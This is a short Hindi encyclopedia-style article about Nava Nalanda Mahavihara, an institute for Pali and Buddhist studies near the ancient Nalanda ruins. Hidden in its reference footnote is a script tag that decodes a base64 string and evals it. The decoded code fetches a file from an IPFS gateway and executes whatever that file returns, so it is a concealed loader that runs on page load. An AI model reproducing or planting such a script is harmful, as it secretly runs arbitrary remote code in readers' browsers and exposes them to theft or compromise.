नव नालन्दा महाविहार

भारत डिस्कवरी प्रस्तुति
(नव नालंदा महाविहार से पुनर्निर्देशित)
यहाँ जाएँ:भ्रमण, खोजें

नव नालन्दा महाविहार पाली साहित्य और बौद्ध धर्म के अध्ययन और अनुसंधान के लिए समर्पित, अपेक्षाकृत एक नया संस्थान है। यह विदेश के छात्रों को भी आकर्षित करता है।

  • इस संस्थान की स्थापना प्राचीन नालंदा महाविहार की तर्ज पर पाली और बौद्ध धर्म में उच्च अध्ययन के केंद्र के रूप में विकसित करने के उद्देश्य से की गई थी।
  • संस्थान प्रारम्भ से ही एक आवासीय संस्थान के रूप में कार्य कर रहा है।
  • भारतीय और विदेशी छात्रों को सीमित संख्या में दाखिला प्रदान किया जाता है।
  • नव नालंदा महाविहार को भारत के विश्वविद्यालय अनुदान आयोग द्वारा "डीम्ड टू बी यूनिवर्सिटी" का दर्जा दिया गया है।
  • महाविहार का वर्तमान परिसर ऐतिहासिक इंद्रपुष्कर्णी झील के दक्षिणी तट पर स्थित है, जबकि प्राचीन नालंदा विश्वविद्यालय के भग्नावशेष झील के उत्तरी तट के करीब स्थित है।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. नव नालन्दा महाविहार (हिन्दी) अतुल्य भारत। अभिगमन तिथि: 28 दिसम्बर, 2019।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख